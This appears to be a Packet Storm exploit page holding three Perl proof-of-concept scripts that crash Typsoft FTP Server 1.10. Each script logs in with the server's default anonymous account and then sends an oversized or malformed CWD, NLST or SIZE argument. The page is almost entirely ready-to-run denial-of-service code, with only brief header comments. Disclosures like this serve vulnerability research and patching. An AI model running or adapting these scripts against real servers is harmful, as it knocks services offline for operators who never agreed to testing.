Three proof of concept exploits that demonstrate denial of service vulnerabilities in Typsoft FTP server version 1.10.
df9286e98ac358e8f0a5ed272a271e60Exploit 1:
#!/usr/bin/perl
# Exploit Title: Typsoft FTP Server DoS CWD command
# Date: 02/06/2012
# Author: Balazs Makany
# Software Link: http://sourceforge.net/projects/ftpserv/
# Version: 1.10
# Tested on: Windows 7
# (does not work on Windows XP)
#
# Please note, that you need to have a valid username/password to execute the malformed command on the server. The server comes with an enabled by default Anonymous account, which is used below.
#
use IO::Socket;
$user = "USER anonymous\r\n";
$passw = "PASS anonymous@127.0.0.1\r\n";
$command = "CWD ";
$dos_input = "."x250;
$send = "\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
);
$socket->recv($serverdata, 1024);
print $serverdata;
$socket->send($user);
$socket->recv($serverdata, 1024);
$socket->send($passw);
$socket->recv($serverdata, 1024);
$socket->send($command.$dos_input.$send);
Exploit 2:
#!/usr/bin/perl
# Exploit Title: Typsoft FTP Server DoS NLST command
# Date: 02/06/2012
# Author: Balazs Makany
# Software Link: http://sourceforge.net/projects/ftpserv/
# Version: 1.10
# Tested on: Windows 7
# (does not work on Windows XP)
#
# Please note, that you need to have a valid username/password to execute the malformed command on the server. The server comes with an enabled by default Anonymous account, which is used below.
#
use IO::Socket;
$user = "USER anonymous\r\n";
$passw = "PASS anonymous@127.0.0.1\r\n";
$command = "NLST ";
$dos_input = "/.../.../.../.../.../";
$send = "\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
);
$socket->recv($serverdata, 1024);
print $serverdata;
$socket->send($user);
$socket->recv($serverdata, 1024);
$socket->send($passw);
$socket->recv($serverdata, 1024);
$socket->send($command.$dos_input.$send);
Exploit 3:
#!/usr/bin/perl
# Exploit Title: Typsoft FTP Server DoS SIZE command
# Date: 02/06/2012
# Author: Balazs Makany
# Software Link: http://sourceforge.net/projects/ftpserv/
# Version: 1.10
# Tested on: Windows 7
# (does not work on Windows XP)
#
# Please note, that you need to have a valid username/password to execute the malformed command on the server. The server comes with an enabled by default Anonymous account, which is used below.
#
use IO::Socket;
$user = "USER anonymous\r\n";
$passw = "PASS anonymous@127.0.0.1\r\n";
$command = "SIZE ";
$dos_input = "/.../.../.../.../.../";
$send = "\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
);
$socket->recv($serverdata, 1024);
print $serverdata;
$socket->send($user);
$socket->recv($serverdata, 1024);
$socket->send($passw);
$socket->recv($serverdata, 1024);
$socket->send($command.$dos_input.$send);
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!